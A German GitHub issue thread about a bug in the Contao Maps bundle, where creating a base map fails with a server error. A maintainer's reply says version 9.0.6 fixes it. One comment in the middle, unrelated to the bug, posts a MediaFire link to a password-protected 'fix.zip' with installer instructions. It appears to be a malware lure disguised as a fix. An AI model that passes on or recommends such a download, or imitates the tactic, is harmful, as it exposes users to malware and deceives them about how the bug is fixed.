### ISSUE TITLE
Basiskarte kann nicht eingefügt werden

### ISSUE THREAD

**Issue by arminfrey** [Kuestenschmiede/MapsBundle#98]
Contao 5.3.13, Maps 9.0.3.0

Nach einer Neuinstallation in einer Subdomain (in welcher noch nie Maps installiert wurde) versuche ich eine Basiskarte anzulegen. Neu:
![2024-08-26 14_01_43-Basiskarten](https://github.com/user-attachments/assets/a20bcf4f-1846-445c-b0fe-36b8dd36bdc7)

Ich kann nichts auswählen. Wenn ich dann auf "Ablage leeren" und "Zurück" gehe, bekomme ich eine Fehlermeldung:
![2024-08-26 14_02_46-Internal Server Error](https://github.com/user-attachments/assets/a4ff3066-de3f-42b5-8eae-f04ea910c9b9)

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by coastforge-mei** [comment]
Mit der Version 9.0.6 ist dieser Fehler in Contao 5 behoben.
